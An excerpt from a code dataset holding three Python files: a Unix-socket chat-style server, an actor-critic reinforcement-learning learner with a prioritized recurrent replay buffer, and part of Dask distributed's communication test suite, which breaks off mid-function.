source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
multip_thread_rtsp_one_socket_server.py | # coding:utf-8
# 服务端
import os
import socket
import threading
import time
# 接收的方法
# def clientThreadIn(conn, nick):
# while True:
# try:
# temp = conn.recv(1024)
# if not temp:
# conn.close()
# return
# print("temp len = ", len(temp))
# except:
# conn.close()
# print(nick + 'leaves the room!') # 出现异常就退出
# return
# # 发送的方法
# def clientThreadOut(conn, nick):
# global data
# while True:
# if con.acquire():
# con.wait() # 放弃对资源占有 等待通知
# if data:
# try:
# conn.send(data)
# con.release()
# except:
# con.release()
# return
# def NotifyAll(ss):
# global data
# if con.acquire(): # 获取锁 原子操作
# data = ss
# con.notifyAll() # 当前线程放弃对资源占有, 通知所有
# con.release()
if __name__ == '__main__':
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
conn = './temp/conn'
if not os.path.exists(conn):
os.mknod(conn)
if os.path.exists(conn):
os.unlink(conn)
sock.bind(conn)
sock.listen(1)
while True:
conn, addr = sock.accept() # 接收连接
# print('Connected with' + addr[0] + ':' + str(addr[1]))
nick = conn.recv(1024) # 获取用户名
print('Welcome' + str(nick) + 'to the room')
# print(data)
# print(str((threading.activeCount() + 1) / 2) + 'person(s)')
# conn.send(data)
# threading.Thread(target=clientThreadIn, args=(conn, nick)).start()
# threading.Thread(target=clientThreadOut, args=(conn, nick)).start()
while True:
try:
time.sleep(2)
conn.send('start'.encode('utf-8'))
temp = ''
while True:
temp = conn.recv(1024)
print(temp.decode('utf-8'))
if len(temp) != 0:break
print("temp len = ", len(temp))
except:
conn.close()
print(str(nick) + 'leaves the room!') # 出现异常就退出
break
|
learner.py | import torch
import torch.utils.data
import torch.optim as optim
import torch.nn as nn
import numpy as np
from collections import deque
import random
import gym
import os
from copy import deepcopy
from time import time, sleep
import torch.multiprocessing as mp
from models import ActorNet, CriticNet
import pickle
from actor import Actor, actor_process
import queue
import visdom
vis = visdom.Visdom()
ttime = time()
def time_check(num=0):
global ttime
print(f'{num} time:{time()-ttime}')
ttime = time()
class LearnerReplayMemory:
def __init__(self, memory_sequence_size ,config, dev ):
self.memory_sequence_size = memory_sequence_size
self.sequence_counter = 0
self.batch_size = config['batch_size']
self.memory = deque()
self.recurrent_state = deque()
self.priority = deque()
self.total_priority = deque()
self.dev = dev
self.burn_in_length = config['burn_in_length'] # 40-80
self.learning_length = config['learning_length']
self.sequence_length = self.burn_in_length + self.learning_length
self.n_step = config['n_step']
self.obs_shape = (self.sequence_length+self.n_step,self.batch_size)+config['obs_space'][1:]
self.reward_shape = (self.sequence_length+self.n_step,self.batch_size)+config['reward_space'][1:]
self.gamma_shape = (self.sequence_length+self.n_step,self.batch_size)+config['gamma_space'][1:]
self.action_shape = (self.sequence_length+self.n_step,self.batch_size)+config['action_space'][1:]
def size(self):
# return sum([len(self.memory[i]) for i in range(len(self.memory))])
return len(self.memory)
def get(self, index):
return self.memory[index]
def clear(self):
self.memory.clear()
self.recurrent_state.clear()
self.priority.clear()
self.total_priority.clear()
def get_weighted_sample_index(self):
total_priority = torch.tensor(self.total_priority).view(-1)
# print('priority : ',total_priority.size(0))
return torch.utils.data.WeightedRandomSampler(total_priority, self.batch_size, replacement=True)
def sample(self):
sample_episode_index = self.get_weighted_sample_index()
sample_episode_index = [index for index in sample_episode_index]
# batch * sequence * elements(obs, action, reward, done)
sample_sequence_index = []
rnn_state_batch = []
traj_s=[]
traj_a=[]
traj_r = []
traj_gam = []
for episode_index in sample_episode_index:
episode_trajectory = self.memory[episode_index]
priority = torch.tensor(self.priority[episode_index])
sequence_index = torch.utils.data.WeightedRandomSampler(priority, 1, replacement = True)
sequence_index = [index for index in sequence_index]
sequence_index = sequence_index[0]
sample_sequence_index.append(sequence_index)
ss,aa,rr,gg = zip(*(episode_trajectory[sequence_index: sequence_index + self.sequence_length+self.n_step]))
traj_s.append(torch.cat(ss))
traj_a.append(torch.cat(aa))
traj_r.append(torch.cat(rr))
traj_gam.append(torch.cat(gg))
#trajectory_sequence_batch.append(episode_trajectory[sequence_index: sequence_index + self.sequence_length+self.n_step])
episode_rnn_state = self.recurrent_state[episode_index]
act,tact,cri,tcri = episode_rnn_state[sequence_index]
rnn_state_batch.append([act,tact,cri,tcri])
#rnn_state_batch.append(episode_rnn_state[sequence_index])
# elements(obs, action, reward, terminal) * sequence * batch
#trajectory_batch_sequence = [[[trajectory_sequence_batch[b][s][e] for b in range(self.batch_size)] for s in range(self.sequence_length+self.n_step)] for e in range(4)]
# 4,18,6,1,3,, [obs_act_rew_gam, seq, batch, ]
obs_batch_sequence = torch.stack(traj_s).reshape( self.obs_shape ).to(self.dev)
action_batch_sequence = torch.stack(traj_a).reshape( self.action_shape ).to(self.dev)
reward_batch_sequence = torch.stack(traj_r).reshape( self.reward_shape ).to(self.dev)
gamma_batch_sequence = torch.stack(traj_gam).reshape( self.gamma_shape ).to(self.dev)
# obs_batch_sequence = torch.Tensor(trajectory_batch_sequence[0]).to(self.dev)
# action_batch_sequence = torch.Tensor(trajectory_batch_sequence[1]).to(self.dev)
# reward_batch_sequence = torch.Tensor(trajectory_batch_sequence[2]).to(self.dev)
# gamma_batch_sequence = torch.Tensor(trajectory_batch_sequence[3]).to(self.dev)
act,tact,cri,tcri = zip(*rnn_state_batch)
shape2 = (2,self.batch_size,-1)
actor_state_batch = torch.stack(act).reshape( shape2).to(self.dev)
target_actor_state_batch= torch.stack(tact).reshape( shape2).to(self.dev)
critic_state_batch = torch.stack(cri).reshape( shape2).to(self.dev)
target_critic_state_batch = torch.stack(tcri).reshape( shape2).to(self.dev)
return sample_episode_index, sample_sequence_index, obs_batch_sequence, action_batch_sequence, reward_batch_sequence, gamma_batch_sequence, \
actor_state_batch, target_actor_state_batch, critic_state_batch, target_critic_state_batch
def append(self, data):
self.memory.append(data[0])
self.recurrent_state.append(data[1])
self.priority.append(data[2])
self.total_priority.append(sum(data[2]))
# self.sequence_counter += sum([len(data[0]) - (self.sequence_length+self.n_step-1) ])
self.sequence_counter += 1
while self.sequence_counter > self.memory_sequence_size:
# self.sequence_counter -= len(self.memory.popleft()) - (self.sequence_length)
self.sequence_counter -= 1
self.recurrent_state.popleft()
self.priority.popleft()
self.total_priority.popleft()
def calc_priority(td_loss, eta=0.9):
stack = td_loss
return eta* stack.max(dim=0)[0] + (1.-eta )*stack.mean(dim=0)
# return eta * max((td_loss)) + (1. - eta) * (sum((td_loss)) / len(td_loss))
def soft_update(target_model, model, tau):
for target_param, param in zip(target_model.parameters(), model.parameters()):
target_param.data.copy_(target_param.data * (1.0 - tau) + param.data * tau)
class Learner:
def __init__(self, learner_id,config,dev,shared_state,shared_queue):
self.action_size = config['action_space']
self.obs_size = config['obs_space']
self.shared_queue = shared_queue
self.shared_state = shared_state
self.dev = dev
self.id = learner_id
self.burn_in_length = config['burn_in_length'] # 40-80
self.learning_length = config['learning_length']
self.sequence_length = self.burn_in_length + self.learning_length
self.n_step = config['n_step']
self.sequence = []
self.recurrent_state = []
self.priority = []
self.td_loss = deque(maxlen=self.learning_length)
self.gamma = config['gamma']
# self.actor_parameter_update_interval = config['actor_parameter_update_interval']
self.actor = ActorNet(dev,config).to(self.dev)
self.target_actor = ActorNet(dev,config).to(self.dev)
self.critic = CriticNet(dev,config).to(self.dev)
self.target_critic = CriticNet(dev,config).to(self.dev)
self.actor.load_state_dict(self.shared_state["actor"].state_dict())
self.target_actor.load_state_dict(self.shared_state["target_actor"].state_dict())
self.critic.load_state_dict(self.shared_state["critic"].state_dict())
self.target_critic.load_state_dict(self.shared_state["target_critic"].state_dict())
# self.actor.load_state_dict(self.shared_state["actor"])
# self.target_actor.load_state_dict(self.shared_state["target_actor"])
# self.critic.load_state_dict(self.shared_state["critic"])
# self.target_critic.load_state_dict(self.shared_state["target_critic"])
self.learner_actor_rate = config['learner_actor_rate']
self.num_actors = learner_id
self.n_actions = 1
self.max_frame = config['learner_max_frame']
self.memory_sequence_size = config['memory_sequence_size']
self.batch_size = config['batch_size']
self.memory = LearnerReplayMemory(self.memory_sequence_size, config, dev)
self.model_path = './'
# self.memory_path = './memory_data/'
# self.model_save_interval = 10 # 50
self.learner_parameter_update_interval = config['learner_parameter_update_interval'] # 50
self.target_update_inverval = config['target_update_interval'] # 100
self.gamma = config['gamma']
self.actor_lr = config['actor_lr']
self.critic_lr = config['critic_lr']
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=self.actor_lr)
self.actor_criterion = nn.MSELoss()
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=self.critic_lr)
self.critic_criterion = nn.MSELoss()
def __del__(self):
self.shared_queue.close()
self.shared_state.close()
# self.save_model()
def save_model(self):
model_dict = {'actor': self.actor.state_dict(),
'target_actor': self.target_actor.state_dict(),
'critic': self.critic.state_dict(),
'target_critic': self.target_critic.state_dict()}
torch.save(model_dict, self.model_path + 'model.pt')
def update_target_model(self):
self.target_actor.load_state_dict(self.actor.state_dict())
self.target_critic.load_state_dict(self.critic.state_dict())
def run(self):
time_check(-1)
while self.memory.size() < self.batch_size :
self.memory.append(self.shared_queue.get(block=True))
# self.memory.append(self.shared_queue.get())
print('\rmem size: ',self.memory.size(),end='\r')
time_check(1)
count_mem=0
frame = 0
win_v = vis.line(Y=torch.Tensor([0]), opts=dict(title ='V_loss'))
win_p = vis.line(Y=torch.Tensor([0]), opts=dict(title ='P_loss'))
while frame < self.max_frame:
# sleep(0.0001)
# if self.shared_queue.qsize()==0 and count_mem <0:
# self.memory.append(self.shared_queue.get(block=True))
#
# for i in range(self.shared_queue.qsize()):
# self.memory.append(self.shared_queue.get(block=False))
# count_mem += self.learner_actor_rate
# print('waiting shared q {}/{}'.format(self.memory.size(),self.batch_size))
# self.shared_state['frame'][self.id]=frame
# while self.shared_state['sleep'][self.id] :
# sleep(0.5)
# if self.shared_queue.qsize()==0 and count_mem <0:
# self.memory.append(self.shared_queue.get(block=True))
# self.memory.append(self.shared_queue.get())
# for i in range(self.shared_queue.qsize()):
## global_buf.append(self.shared_queue.get())
# self.memory.append(self.shared_queue.get())
# count_mem += self.learner_actor_rate
if self.shared_queue.qsize()!=0:
self.memory.append(self.shared_queue.get(block=True))
frame+=1
count_mem -= 1
episode_index, sequence_index, obs_seq, action_seq, reward_seq, gamma_seq, a_state, ta_state, c_state, tc_state = self.memory.sample()
self.actor.set_state(a_state[0], a_state[1])
self.target_actor.set_state(ta_state[0], ta_state[1])
self.critic.set_state(c_state[0], c_state[1])
self.target_critic.set_state(tc_state[0], tc_state[1])
### burn-in step ###
_ = [self.actor(obs_seq[i]) for i in range(self.burn_in_length)]
_ = [self.critic(obs_seq[i],action_seq[i]) for i in range(self.burn_in_length)]
_ = [self.target_actor(obs_seq[i]) for i in range(self.burn_in_length+self.n_step)]
_ = [self.target_critic(obs_seq[i],action_seq[i]) for i in range(self.burn_in_length+self.n_step)]
### learning steps ###
# update ciritic
q_value = torch.zeros(self.learning_length * self.batch_size, self.n_actions)
target_q_value = torch.zeros(self.learning_length * self.batch_size, self.n_actions)
for i in range(self.learning_length):
obs_i = self.burn_in_length + i
next_obs_i = self.burn_in_length + i + self.n_step
q_value[i*self.batch_size: (i+1)*self.batch_size] = self.critic(obs_seq[obs_i], action_seq[obs_i])
with torch.no_grad():
next_q_value = self.target_critic(obs_seq[next_obs_i], self.target_actor(obs_seq[next_obs_i]))
target_q_val = reward_seq[obs_i] + (gamma_seq[next_obs_i]** self.n_step) * next_q_value
# target_q_val = invertical_vf(target_q_val)
target_q_value[i*self.batch_size: (i+1)*self.batch_size] = target_q_val
critic_loss = self.actor_criterion(q_value, target_q_value.detach())
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
# update actor
self.actor.reset_state()
self.critic.reset_state()
actor_loss = torch.zeros(self.learning_length * self.batch_size, self.n_actions).to(self.dev)
for i in range(self.learning_length):
obs_i = i + self.burn_in_length
action = self.actor(obs_seq[obs_i])
actor_loss[i*self.batch_size: (i+1)*self.batch_size] = -self.critic(obs_seq[obs_i], self.actor(obs_seq[obs_i]))
actor_loss = actor_loss.mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
# update target networks
if frame % self.target_update_inverval == 0:
self.update_target_model()
print('#',frame,'critic_loss:',critic_loss.item(),' actor_loss:',actor_loss.item() ,' count:',count_mem)
win_p = vis.line(X=torch.Tensor([frame]), Y=torch.Tensor([actor_loss.item()]), win= win_p , update ='append')
win_v = vis.line(X=torch.Tensor([frame]), Y=torch.Tensor([critic_loss.item()]), win= win_v , update ='append')
# calc priority
average_td_loss = ((q_value - target_q_value)**2).detach().to(self.dev)
# average_td_loss = np.mean(((q_value - target_q_value)**2).detach().cpu().numpy() , axis = 1)
for i in range(len(episode_index)):
td = average_td_loss[i: -1: self.batch_size]
self.memory.priority[episode_index[i]][sequence_index[i]] = calc_priority(td).cpu().view(1,-1)
self.memory.total_priority[episode_index[i]] = torch.cat(self.memory.priority[episode_index[i]]).sum(0).view(1,-1)
# self.memory.priority[episode_index[i]][sequence_index[i]] = calc_priority(td)
# self.memory.total_priority[episode_index[i]] = sum(self.memory.priority[episode_index[i]])
# if frame % self.model_save_interval == 0:
# self.save_model()
if frame % self.learner_parameter_update_interval == 0:
# print('learner update ')
# [self.shared_state["actor"][k] = v.cpu() for k,v in self.actor.state_dict().item() ]
# [self.shared_state["target_actor"][k] = v.cpu() for k,v in self.target_actor.state_dict().item() ]
# [self.shared_state["critic"][k] = v.cpu() for k,v in self.critic.state_dict().item() ]
# [self.shared_state["target_critic"][k] = v.cpu() for k,v in self.target_critic.state_dict().item() ]
#
# for k,v in self.actor.state_dict().items():
# self.shared_state["actor"][k] = v.cpu()
# for k,v in self.target_actor.state_dict().items():
# self.shared_state["target_actor"][k] = v.cpu()
# for k,v in self.critic.state_dict().items():
# self.shared_state["critic"][k] = v.cpu()
# for k,v in self.target_critic.state_dict().items():
# self.shared_state["target_critic"][k] = v.cpu()
# self.shared_state["actor"] = self.actor.state_dict()
# self.shared_state["target_actor"] = self.target_actor.state_dict()
# self.shared_state["critic"] = self.critic.state_dict()
# self.shared_state["target_critic"] = self.target_critic.state_dict()
self.shared_state["actor"].load_state_dict(self.actor.state_dict())
self.shared_state["critic"].load_state_dict(self.critic.state_dict())
self.shared_state["target_actor"].load_state_dict(self.target_actor.state_dict())
self.shared_state["target_critic"].load_state_dict(self.target_critic.state_dict())
for i in range(self.num_actors):
self.shared_state["update"][i]=True
print('learner_update',self.actor.policy_l0.weight.data[0][0])
self.actor.reset_state()
self.target_actor.reset_state()
self.critic.reset_state()
self.target_critic.reset_state()
def learner_process(lid,config,dev_cpu,shared_state,shared_queue):
learner = Learner(lid,config,dev_cpu,shared_state,shared_queue)
learner.run()
from actor import Actor, actor_process
import queue
if __name__ == '__main__':
config = {
'game_name':'CartPole-v0',
# cartpole state space 1,4
# 'obs_space':(1,4),
# 'reward_space':(1,1),
# 'gamma_space':(1,1),
# 'num_envs':1,
# 'use_cnn':False,
# 'action_argmax':True,
'obs_space':(1,3,84,84),
'reward_space':(1,1),
'gamma_space':(1,1),
'action_space':(1,2),
'num_envs':1,
'use_cnn':True,
'action_argmax':True,
'get_img_from_render':True,
#
# 'game_name':'Pendulum-v0',
# 'action_space':1,
# 'obs_space':(1,3),
'burn_in_length':3,
'learning_length':6,
'n_step':3,
'memory_sequence_size':500,
# 'actor_parameter_update_interval':2000,
'learner_parameter_update_interval':100,
'actor_lr':1e-4,
'critic_lr':1e-3,
'gamma':0.997,
'actor_max_frame':100,
'learner_max_frame':10,
'batch_size':5,
'num_processes':1,
'learner_actor_rate':20,
'target_update_interval':30,
'max_shared_q_size':50,
}
num_processes = config['num_processes']
use_cuda = torch.cuda.is_available()
dev_cpu = torch.device('cpu')
dev_gpu = torch.device('cuda' if use_cuda else 'cpu')
# manager = mp.Manager()
# shared_state = manager.dict()
# shared_queue = manager.Queue()
shared_queue = mp.Queue()
# shared_queue = queue.Queue()
shared_state = dict()
shared_state["actor"] = ActorNet(dev_cpu,config).share_memory()
shared_state["critic"] = CriticNet(dev_cpu,config).share_memory()
shared_state["target_actor"] = ActorNet(dev_cpu,config).share_memory()
shared_state["target_critic"] = CriticNet(dev_cpu,config).share_memory()
# shared_state["frame"] = mp.Array('i', [0 for i in range(num_processes)])
# shared_state["sleep"] = mp.Array('i', [0 for i in range(num_processes)])
shared_state["update"] = mp.Array('i', [0 for i in range(num_processes)])
# shared_state["actor"] = ActorNet(config['obs_space'], config['action_space'],dev_cpu)
# shared_state["critic"] = CriticNet(config['obs_space'], config['action_space'],dev_cpu)
# shared_state["target_actor"] = ActorNet(config['obs_space'], config['action_space'],dev_cpu)
# shared_state["target_critic"] = CriticNet(config['obs_space'], config['action_space'],dev_cpu)
# shared_state["frame"] = [0 for i in range(num_processes)]
# shared_state["sleep"] = [0 for i in range(num_processes)]
# shared_state["update"]=False
#
proc_list = []
# proc_list.append(mp.Process(target=learner_process, args=(num_processes, config,dev_gpu,shared_state,shared_queue)))
# eps = [0.05,0.6,0.4,0.3,0.2,0.6,0.4,0.6,0.2,0.4]
# for i in range(num_processes):
# proc_list.append( mp.Process(target=actor_process, args=(i,config,dev_gpu,shared_state,shared_queue,eps[i])) )
# for proc in proc_list:
# proc.start()
try:
for i in range(10):
actor_process(0,config,dev_cpu,shared_state,shared_queue,0.3)
# actor_process(1,config,dev_cpu,shared_state,shared_queue,0.3)
# actor_process(2,config,dev_cpu,shared_state,shared_queue,0.3)
learner_process(3,config,dev_cpu,shared_state,shared_queue)
# for proc in proc_list:
# proc.join()
except:
print('qclose')
shared_queue.close()
# print('shared_state close')
# shared_state["update"].close()
# for key in shared_state.keys():
# shared_state[key].close()
print('process close')
for proc in proc_list:
proc.terminate()
shared_queue.join_thread()
# shared_state["update"].join_thread()
# for key in shared_state.keys():
# shared_state[key].join_thread()
# shared_state.close()
# shared_queue.close()
|
test_comms.py | import asyncio
import os
import sys
import threading
import types
import warnings
from functools import partial
import pkg_resources
import pytest
from tornado import ioloop
from tornado.concurrent import Future
import dask
import distributed
from distributed.comm import (
CommClosedError,
connect,
get_address_host,
get_local_address_for,
inproc,
listen,
parse_address,
parse_host_port,
resolve_address,
tcp,
unparse_host_port,
)
from distributed.comm.registry import backends, get_backend
from distributed.comm.tcp import TCP, TCPBackend, TCPConnector
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.protocol import Serialized, deserialize, serialize, to_serialize
from distributed.utils import get_ip, get_ipv6
from distributed.utils_test import (
get_cert,
get_client_ssl_context,
get_server_ssl_context,
has_ipv6,
requires_ipv6,
)
EXTERNAL_IP4 = get_ip()
if has_ipv6():
with warnings.catch_warnings(record=True):
warnings.simplefilter("always")
EXTERNAL_IP6 = get_ipv6()
ca_file = get_cert("tls-ca-cert.pem")
# The Subject field of our test certs
cert_subject = (
(("countryName", "XY"),),
(("localityName", "Dask-distributed"),),
(("organizationName", "Dask"),),
(("commonName", "localhost"),),
)
def check_tls_extra(info):
assert isinstance(info, dict)
assert info["peercert"]["subject"] == cert_subject
assert "cipher" in info
cipher_name, proto_name, secret_bits = info["cipher"]
# Most likely
assert "AES" in cipher_name
assert "TLS" in proto_name
assert secret_bits >= 128
tls_kwargs = dict(
listen_args={"ssl_context": get_server_ssl_context()},
connect_args={"ssl_context": get_client_ssl_context()},
)
@pytest.mark.asyncio
async def get_comm_pair(listen_addr, listen_args={}, connect_args={}, **kwargs):
q = asyncio.Queue()
async def handle_comm(comm):
await q.put(comm)
listener = await listen(listen_addr, handle_comm, **listen_args, **kwargs)
comm = await connect(listener.contact_address, **connect_args, **kwargs)
serv_comm = await q.get()
return (comm, serv_comm)
def get_tcp_comm_pair(**kwargs):
return get_comm_pair("tcp://", **kwargs)
def get_tls_comm_pair(**kwargs):
kwargs.update(tls_kwargs)
return get_comm_pair("tls://", **kwargs)
def get_inproc_comm_pair(**kwargs):
return get_comm_pair("inproc://", **kwargs)
async def debug_loop():
"""
Debug helper
"""
while True:
loop = ioloop.IOLoop.current()
print(".", loop, loop._handlers)
await asyncio.sleep(0.50)
#
# Test utility functions
#
def test_parse_host_port():
f = parse_host_port
assert f("localhost:123") == ("localhost", 123)
assert f("127.0.0.1:456") == ("127.0.0.1", 456)
assert f("localhost:123", 80) == ("localhost", 123)
assert f("localhost", 80) == ("localhost", 80)
with pytest.raises(ValueError):
f("localhost")
assert f("[::1]:123") == ("::1", 123)
assert f("[fe80::1]:123", 80) == ("fe80::1", 123)
assert f("[::1]", 80) == ("::1", 80)
with pytest.raises(ValueError):
f("[::1]")
with pytest.raises(ValueError):
f("::1:123")
with pytest.raises(ValueError):
f("::1")
def test_unparse_host_port():
f = unparse_host_port
assert f("localhost", 123) == "localhost:123"
assert f("127.0.0.1", 123) == "127.0.0.1:123"
assert f("::1", 123) == "[::1]:123"
assert f("[::1]", 123) == "[::1]:123"
assert f("127.0.0.1") == "127.0.0.1"
assert f("127.0.0.1", None) == "127.0.0.1"
assert f("127.0.0.1", "*") == "127.0.0.1:*"
assert f("::1") == "[::1]"
assert f("[::1]") == "[::1]"
assert f("::1", "*") == "[::1]:*"
def test_get_address_host():
f = get_address_host
assert f("tcp://127.0.0.1:123") == "127.0.0.1"
assert f("inproc://%s/%d/123" % (get_ip(), os.getpid())) == get_ip()
def test_resolve_address():
f = resolve_address
assert f("tcp://127.0.0.1:123") == "tcp://127.0.0.1:123"
assert f("127.0.0.2:789") == "tcp://127.0.0.2:789"
assert f("tcp://0.0.0.0:456") == "tcp://0.0.0.0:456"
assert f("tcp://0.0.0.0:456") == "tcp://0.0.0.0:456"
if has_ipv6():
assert f("tcp://[::1]:123") == "tcp://[::1]:123"
assert f("tls://[::1]:123") == "tls://[::1]:123"
# OS X returns '::0.0.0.2' as canonical representation
assert f("[::2]:789") in ("tcp://[::2]:789", "tcp://[::0.0.0.2]:789")
assert f("tcp://[::]:123") == "tcp://[::]:123"
assert f("localhost:123") == "tcp://127.0.0.1:123"
assert f("tcp://localhost:456") == "tcp://127.0.0.1:456"
assert f("tls://localhost:456") == "tls://127.0.0.1:456"
def test_get_local_address_for():
f = get_local_address_for
assert f("tcp://127.0.0.1:80") == "tcp://127.0.0.1"
assert f("tcp://8.8.8.8:4444") == "tcp://" + get_ip()
if has_ipv6():
assert f("tcp://[::1]:123") == "tcp://[::1]"
inproc_arg = "inproc://%s/%d/444" % (get_ip(), os.getpid())
inproc_res = f(inproc_arg)
assert inproc_res.startswith("inproc://")
assert inproc_res != inproc_arg
#
# Test concrete transport APIs
#
@pytest.mark.asyncio
async def test_tcp_listener_does_not_call_handler_on_handshake_error():
handle_comm_called = False
async def handle_comm(comm):
nonlocal handle_comm_called
handle_comm_called = True
with dask.config.set({"distributed.comm.timeouts.connect": 0.01}):
listener = await tcp.TCPListener("127.0.0.1", handle_comm)
host, port = listener.get_host_port()
# connect without handshake:
reader, writer = await asyncio.open_connection(host=host, port=port)
# wait a bit to let the listener side hit the timeout on the handshake:
await asyncio.sleep(0.02)
assert not handle_comm_called
writer.close()
await writer.wait_closed()
@pytest.mark.asyncio
async def test_tcp_specific():
"""
Test concrete TCP API.
"""
async def handle_comm(comm):
assert comm.peer_address.startswith("tcp://" + host)
assert comm.extra_info == {}
msg = await comm.read()
msg["op"] = "pong"
await comm.write(msg)
await comm.close()
listener = await tcp.TCPListener("127.0.0.1", handle_comm)
host, port = listener.get_host_port()
assert host in ("localhost", "127.0.0.1", "::1")
assert port > 0
l = []
async def client_communicate(key, delay=0):
addr = "%s:%d" % (host, port)
comm = await connect(listener.contact_address)
assert comm.peer_address == "tcp://" + addr
assert comm.extra_info == {}
await comm.write({"op": "ping", "data": key})
if delay:
await asyncio.sleep(delay)
msg = await comm.read()
assert msg == {"op": "pong", "data": key}
l.append(key)
await comm.close()
await client_communicate(key=1234)
# Many clients at once
N = 100
futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
await asyncio.gather(*futures)
assert set(l) == {1234} | set(range(N))
@pytest.mark.asyncio
async def test_tls_specific():
"""
Test concrete TLS API.
"""
async def handle_comm(comm):
assert comm.peer_address.startswith("tls://" + host)
check_tls_extra(comm.extra_info)
msg = await comm.read()
msg["op"] = "pong"
await comm.write(msg)
await comm.close()
server_ctx = get_server_ssl_context()
client_ctx = get_client_ssl_context()
listener = await tcp.TLSListener("127.0.0.1", handle_comm, ssl_context=server_ctx)
host, port = listener.get_host_port()
assert host in ("localhost", "127.0.0.1", "::1")
assert port > 0
l = []
async def client_communicate(key, delay=0):
addr = "%s:%d" % (host, port)
comm = await connect(listener.contact_address, ssl_context=client_ctx)
assert comm.peer_address == "tls://" + addr
check_tls_extra(comm.extra_info)
await comm.write({"op": "ping", "data": key})
if delay:
await asyncio.sleep(delay)
msg = await comm.read()
assert msg == {"op": "pong", "data": key}
l.append(key)
await comm.close()
await client_communicate(key=1234)
# Many clients at once
N = 100
futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
await asyncio.gather(*futures)
assert set(l) == {1234} | set(range(N))
@pytest.mark.asyncio
async def test_comm_failure_threading():
"""
When we fail to connect, make sure we don't make a lot
of threads.
We only assert for PY3, because the thread limit only is
set for python 3. See github PR #2403 discussion for info.
"""
async def sleep_for_60ms():
max_thread_count = 0
for x in range(60):
await asyncio.sleep(0.001)
thread_count = threading.active_count()
if thread_count > max_thread_count:
max_thread_count = thread_count
return max_thread_count
original_thread_count = threading.active_count()
# tcp.TCPConnector()
sleep_future = sleep_for_60ms()
with pytest.raises(IOError):
await connect("tcp://localhost:28400", 0.052)
max_thread_count = await sleep_future
# 2 is the number set by BaseTCPConnector.executor (ThreadPoolExecutor)
assert max_thread_count <= 2 + original_thread_count
# tcp.TLSConnector()
sleep_future = sleep_for_60ms()
with pytest.raises(IOError):
await connect(
"tls://localhost:28400", 0.052, ssl_context=get_client_ssl_context()
)
max_thread_count = await sleep_future
assert max_thread_count <= 2 + original_thread_count
async def check_inproc_specific(run_client):
"""
Test concrete InProc API.
"""
listener_addr = inproc.global_manager.new_address()
addr_head = listener_addr.rpartition("/")[0]
client_addresses = set()
N_MSGS = 3
async def handle_comm(comm):
assert comm.peer_address.startswith("inproc://" + addr_head)
client_addresses.add(comm.peer_address)
for i in range(N_MSGS):
msg = await comm.read()
msg["op"] = "pong"
await comm.write(msg)
await comm.close()
listener = await inproc.InProcListener(listener_addr, handle_comm)
assert (
listener.listen_address
== listener.contact_address
== "inproc://" + listener_addr
)
l = []
async def client_communicate(key, delay=0):
comm = await connect(listener.contact_address)
assert comm.peer_address == "inproc://" + listener_addr
for i in range(N_MSGS):
await comm.write({"op": "ping", "data": key})
if delay:
await asyncio.sleep(delay)
msg = await comm.read()
assert msg == {"op": "pong", "data": key}
l.append(key)
with pytest.raises(CommClosedError):
await comm.read()
await comm.close()
client_communicate = partial(run_client, client_communicate)
await client_communicate(key=1234)
# Many clients at once
N = 20
futures = [client_communicate(key=i, delay=0.001) for i in range(N)]
await asyncio.gather(*futures)
assert set(l) == {1234} | set(range(N))
assert len(client_addresses) == N + 1
assert listener.contact_address not in client_addresses
def run_coro(func, *args, **kwargs):
return func(*args, **kwargs)
def run_coro_in_thread(func, *args, **kwargs):
fut = Future()
main_loop = ioloop.IOLoop.current()
def run():
thread_loop = ioloop.IOLoop() # need fresh IO loop for run_sync()
try:
res = thread_loop.run_sync(partial(func, *args, **kwargs), timeout=10)
except Exception:
main_loop.add_callback(fut.set_exc_info, sys.exc_info())
else:
main_loop.add_callback(fut.set_result, res)
finally:
thread_loop.close()
t = threading.Thread(target=run)
t.start()
return fut
@pytest.mark.asyncio
async def test_inproc_specific_same_thread():
await check_inproc_specific(run_coro)
@pytest.mark.asyncio
async def test_inproc_specific_different_threads():
await check_inproc_specific(run_coro_in_thread)
#
# Test communications through the abstract API
#
async def check_client_server(
addr,
check_listen_addr=None,
check_contact_addr=None,
listen_args={},
connect_args={},
):
"""
Abstract client / server test.
"""
async def handle_comm(comm):
scheme, loc = parse_address(comm.peer_address)
assert scheme == bound_scheme
msg = await comm.read()
assert msg["op"] == "ping"
msg["op"] = "pong"
await comm.write(msg)
msg = await comm.read()
assert msg["op"] == "foobar"
await comm.close()
# Arbitrary connection args should be ignored
listen_args = listen_args or {"xxx": "bar"}
connect_args = connect_args or {"xxx": "foo"}
listener = await listen(addr, handle_comm, **listen_args)
# Check listener properties
bound_addr = listener.listen_address
bound_scheme, bound_loc = parse_address(bound_addr)
assert bound_scheme in backends
assert bound_scheme == parse_address(addr)[0]
if check_listen_addr is not None:
check_listen_addr(bound_loc)
contact_addr = listener.contact_address
contact_scheme, contact_loc = parse_address(contact_addr)
assert contact_scheme == bound_scheme
if check_contact_addr is not None:
check_contact_addr(contact_loc)
else:
assert contact_addr == bound_addr
# Check client <-> server comms
l = []
async def client_communicate(key, delay=0):
comm = await connect(listener.contact_address, **connect_args)
assert comm.peer_address == listener.contact_address
await comm.write({"op": "ping", "data": key})
await comm.write({"op": "foobar"})
if delay:
await asyncio.sleep(delay)
msg = await comm.read()
assert msg == {"op": "pong", "data": key}
l.append(key)
await comm.close()
await client_communicate(key=1234)
# Many clients at once
futures = [client_communicate(key=i, delay=0.05) for i in range(20)]
await asyncio.gather(*futures)
assert set(l) == {1234} | set(range(20))
listener.stop()
@pytest.mark.asyncio
async def test_ucx_client_server():
pytest.importorskip("distributed.comm.ucx")
ucp = pytest.importorskip("ucp")
addr = ucp.get_address()
await check_client_server("ucx://" + addr)
def tcp_eq(expected_host, expected_port=None):
def checker(loc):
host, port = parse_host_port(loc)
assert host == expected_host
if expected_port is not None:
assert port == expected_port
else:
assert 1023 < port < 65536
return checker
tls_eq = tcp_eq
def inproc_check():
expected_ip = get_ip()
expected_pid = os.getpid()
def checker(loc):
